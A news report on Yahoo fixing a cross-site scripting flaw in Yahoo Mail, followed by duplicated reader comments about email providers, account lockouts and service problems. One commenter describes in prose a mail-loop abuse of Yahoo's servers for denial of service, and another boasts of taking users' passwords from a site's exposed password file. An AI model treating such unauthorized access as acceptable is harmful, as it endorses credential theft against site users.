Yahoo fixes Web mail security flaw

Yahoo has fixed a security flaw in its free Web-based e-mail service that opened the door to phishing scams, account hijacks and other attacks.

The flaw, known as a cross-site scripting vulnerability, existed because Yahoo's Web site did not detect certain script tags in combination with certain special characters, according to SEC Consult, which issued an advisory on the flaw Friday.

Cross-site scripting flaws are found regularly, including recently in Google's Web site and earlier this year in Microsoft's Xbox 360 site.

Flaws have also been found on Yahoo's site. An attacker could exploit this type of flaw to hijack user accounts, launch information-stealing phishing scams or even download malicious code onto users' computers, experts have said.

A Yahoo representative said it fixed the most recent flaws in the "last few weeks" and that its users are protected.

"Yahoo recently learned of an issue in Yahoo Mail and worked immediately to begin rollout of a server-side fix which does not require users to take any action," said Karen Mahon, a Yahoo spokeswoman. "We are unaware of any users who were impacted by this issue."

[Roman12]

Yahoo mail?

Reading this acrticle made me realize that I do not know anybody who still has a yahoo email address. Before it was very popular, but now you rarely ever see anyone with @yahoo.com anymore. Most people I know who do not own a domain name either use Hotmail or Gmail nowdays. Has anybody else noticed?
__________________________________
R.K.
http://www.Remove-All-Spyware.com/

[m0kume]

I use Yahoo Mail

Hotmail gave me too many problems, Gmail - haven't tried it.

[Roman12]

Yahoo mail?

Reading this acrticle made me realize that I do not know anybody who still has a yahoo email address. Before it was very popular, but now you rarely ever see anyone with @yahoo.com anymore. Most people I know who do not own a domain name either use Hotmail or Gmail nowdays. Has anybody else noticed?
__________________________________
R.K.
http://www.Remove-All-Spyware.com/

[m0kume]

I use Yahoo Mail

Hotmail gave me too many problems, Gmail - haven't tried it.

[i_made_this]

Check out this site...

http://www.trustedsource.org

[i_made_this]

Check out this site...

http://www.trustedsource.org

[sergio_gadaleta]

Not true

The spokewoman for Yahoo, Karen Mahon, is full of it. I am a primary example of my account being hacked. My Yahoo Mail account was hacked on Monday Oct. 17, 2005 and I haven't been able to access the account since. I've called yahoo and e-mailed their security "people" about 50 times (no exageration) and they've brushed me off like a fly on a shoulder. I have VITAL information on that account and they don't care. When this is all over with, yahoo will recieve a call from my lawyer. Somebody's gotta pay for the heartburn and sleepless night I've been trough. That e-mail account has information like 401K, IRA, SS# etc. I hope more people will join me in bringing down that company

Too bad

Man, not to insult you, but I'm sure everyone would agree.. You should not keep personal Information in one source alone, let alone on one free mail server. You should atleast have it kept somewhere, as in on your computer, backed up in a floppy disk or cd, and printed out. It is your fault you lost all that information, because you did not realize that Yahoo and other companies don't care about joe schmoe and his free e-mail. As long as you're not paying them for services, why should they help you?

[chartreuse]

I'm leaving Yahoo

I've had problems getting into my mail for over a month and they're brushing me off, too. I'm sick of them and will warn everyone else about them. I think I'll try hotmail.

[sergio_gadaleta]

Not true

The spokewoman for Yahoo, Karen Mahon, is full of it. I am a primary example of my account being hacked. My Yahoo Mail account was hacked on Monday Oct. 17, 2005 and I haven't been able to access the account since. I've called yahoo and e-mailed their security "people" about 50 times (no exageration) and they've brushed me off like a fly on a shoulder. I have VITAL information on that account and they don't care. When this is all over with, yahoo will recieve a call from my lawyer. Somebody's gotta pay for the heartburn and sleepless night I've been trough. That e-mail account has information like 401K, IRA, SS# etc. I hope more people will join me in bringing down that company

Too bad

Man, not to insult you, but I'm sure everyone would agree.. You should not keep personal Information in one source alone, let alone on one free mail server. You should atleast have it kept somewhere, as in on your computer, backed up in a floppy disk or cd, and printed out. It is your fault you lost all that information, because you did not realize that Yahoo and other companies don't care about joe schmoe and his free e-mail. As long as you're not paying them for services, why should they help you?

[chartreuse]

I'm leaving Yahoo

I've had problems getting into my mail for over a month and they're brushing me off, too. I'm sick of them and will warn everyone else about them. I think I'll try hotmail.

[EagleoneRojax]

Yahoo Problems

Well if you were unaware of problems, let me asure you, that there were! Like no mail ,or mail that is three days late, or doubble sendings of the same mail, either at the same time,or the next day, or the next. I would be glad to have others contact you If you wish,....just so you can be aware, of course! Thanks for your dilagence in making yahoo, a better place to be! Roland

[EagleoneRojax]

Yahoo Problems

Well if you were unaware of problems, let me asure you, that there were! Like no mail ,or mail that is three days late, or doubble sendings of the same mail, either at the same time,or the next day, or the next. I would be glad to have others contact you If you wish,....just so you can be aware, of course! Thanks for your dilagence in making yahoo, a better place to be! Roland

[n3td3v]

Bigger threat was discovered by me

Part 1====
The biggest security issue for Yahoo Mail was discovered by me and reported to Yahoo and the security community. This involved using Yahoo's own mail to friend servers to bombard Yahoo's entire mail networks. Both corporate and consumer side I believe. This allowed an attacker to Create a DDoS situation where mail servers would slowed to a crawl, if not outages. This is because the mail to friend servers allowed for a loop. This allowed a malicious user to send messages out from Yahoo's own production servers. Because this was Yahoo's own mail to friend servers, Yahoo's anti-spam technology treated all messages as "trusted". Therefore, all messages to straight to the Yahoo Mail inbox, than the bulk folder. Apart from this obvious disruption, because all mail was going to the inbox, Yahoo Messenger users would be bombarded with multiple new mail alert dialog boxes. This was a mutli attack, which would have brought wide spread disruption to Yahoo Messenger and Yahoo Mail users.

Part 2====
I believe I discovered the first XSS for Google, way before the article CNET have recently reported on. I discovered a XXS in Google Groups last December 2004. This was reported to Full-Disclosure mailing list and Google's security team. The vulnerability was reported on the Friday to the security community and patched by Google by Sunday night.

Part 3====
It would be great if you could start acknowledging people where credit is due. The real security research for Yahoo and Google is going on by people like me, not the folks coming from these security companies. I am bored with online media outlets only reporting on something if its discovered by "professional security" companies.

All the above can be verfied using a search engine or by contacting Google and Yahoo security teams. I continue to work in the underground to find unique ways to compromise security, that haven't been previously thought of. The guys at these security companies aren't finding flaws, which aren't based on known methods. I, however believe I am going beyond that. See described Y mail vulnerability and the way I used Yahoo to attack Yahoo, rather than attacking from external machines. Yahoo is still vulnerable on attacks using its own production servers. However, the YMail YMessenger hack described was patched!

great

That is great man. I use to be in the underground and was doing the exact same as you. I have found different vulnerabilities in smaller companies.. just login problems.. which the site creators were stupid.. all I had to do was go to source code, look for the file containing passwords, and access it, and got everyones username and password, including Webmaster.

[n3td3v]

Bigger threat was discovered by me

Part 1====
The biggest security issue for Yahoo Mail was discovered by me and reported to Yahoo and the security community. This involved using Yahoo's own mail to friend servers to bombard Yahoo's entire mail networks. Both corporate and consumer side I believe. This allowed an attacker to Create a DDoS situation where mail servers would slowed to a crawl, if not outages. This is because the mail to friend servers allowed for a loop. This allowed a malicious user to send messages out from Yahoo's own production servers. Because this was Yahoo's own mail to friend servers, Yahoo's anti-spam technology treated all messages as "trusted". Therefore, all messages to straight to the Yahoo Mail inbox, than the bulk folder. Apart from this obvious disruption, because all mail was going to the inbox, Yahoo Messenger users would be bombarded with multiple new mail alert dialog boxes. This was a mutli attack, which would have brought wide spread disruption to Yahoo Messenger and Yahoo Mail users.

Part 2====
I believe I discovered the first XSS for Google, way before the article CNET have recently reported on. I discovered a XXS in Google Groups last December 2004. This was reported to Full-Disclosure mailing list and Google's security team. The vulnerability was reported on the Friday to the security community and patched by Google by Sunday night.

Part 3====
It would be great if you could start acknowledging people where credit is due. The real security research for Yahoo and Google is going on by people like me, not the folks coming from these security companies. I am bored with online media outlets only reporting on something if its discovered by "professional security" companies.

All the above can be verfied using a search engine or by contacting Google and Yahoo security teams. I continue to work in the underground to find unique ways to compromise security, that haven't been previously thought of. The guys at these security companies aren't finding flaws, which aren't based on known methods. I, however believe I am going beyond that. See described Y mail vulnerability and the way I used Yahoo to attack Yahoo, rather than attacking from external machines. Yahoo is still vulnerable on attacks using its own production servers. However, the YMail YMessenger hack described was patched!

great

That is great man. I use to be in the underground and was doing the exact same as you. I have found different vulnerabilities in smaller companies.. just login problems.. which the site creators were stupid.. all I had to do was go to source code, look for the file containing passwords, and access it, and got everyones username and password, including Webmaster.

[Kreative4Jesus]

Yahoo

I like Yahoo & they have some benneficial Groups, of which I am an owner of & of some I just belong to them.

They have some flaws, I hope they get them taken care of soon & it is not just about security, but about the lack of comunication, etc.......:

However, here is what has happened to me:
They usually send me a double does of e-mail.
And just recently, I found out that I was bouncing, with some groups that I no-longer belong to. I was bouncing in June & I found out about it in October(?), what gives? There were no-evidence of this prior to correct it & by the time that I was told about it, I no-longer belonged to those groups.

My groups that I've tried to upload pictures to: some will upload, while others do not.

I've filled out a request of sorts for help & I
get this automated letter after you fill out your complaint & you feel like you are comunicating with a wall, where there is no-human on the other side.

I'm sure that I can find other things to complain about. I had something on my mind & right now I'm just an Artist_Drawing_Blanks: LOL

Anyway's, how can I get some real help? Does anyone know.

Cyndi

[Kreative4Jesus]

Yahoo

I like Yahoo & they have some benneficial Groups, of which I am an owner of & of some I just belong to them.

They have some flaws, I hope they get them taken care of soon & it is not just about security, but about the lack of comunication, etc.......:

However, here is what has happened to me:
They usually send me a double does of e-mail.
And just recently, I found out that I was bouncing, with some groups that I no-longer belong to. I was bouncing in June & I found out about it in October(?), what gives? There were no-evidence of this prior to correct it & by the time that I was told about it, I no-longer belonged to those groups.

My groups that I've tried to upload pictures to: some will upload, while others do not.

I've filled out a request of sorts for help & I
get this automated letter after you fill out your complaint & you feel like you are comunicating with a wall, where there is no-human on the other side.

I'm sure that I can find other things to complain about. I had something on my mind & right now I'm just an Artist_Drawing_Blanks: LOL

Anyway's, how can I get some real help? Does anyone know.

Cyndi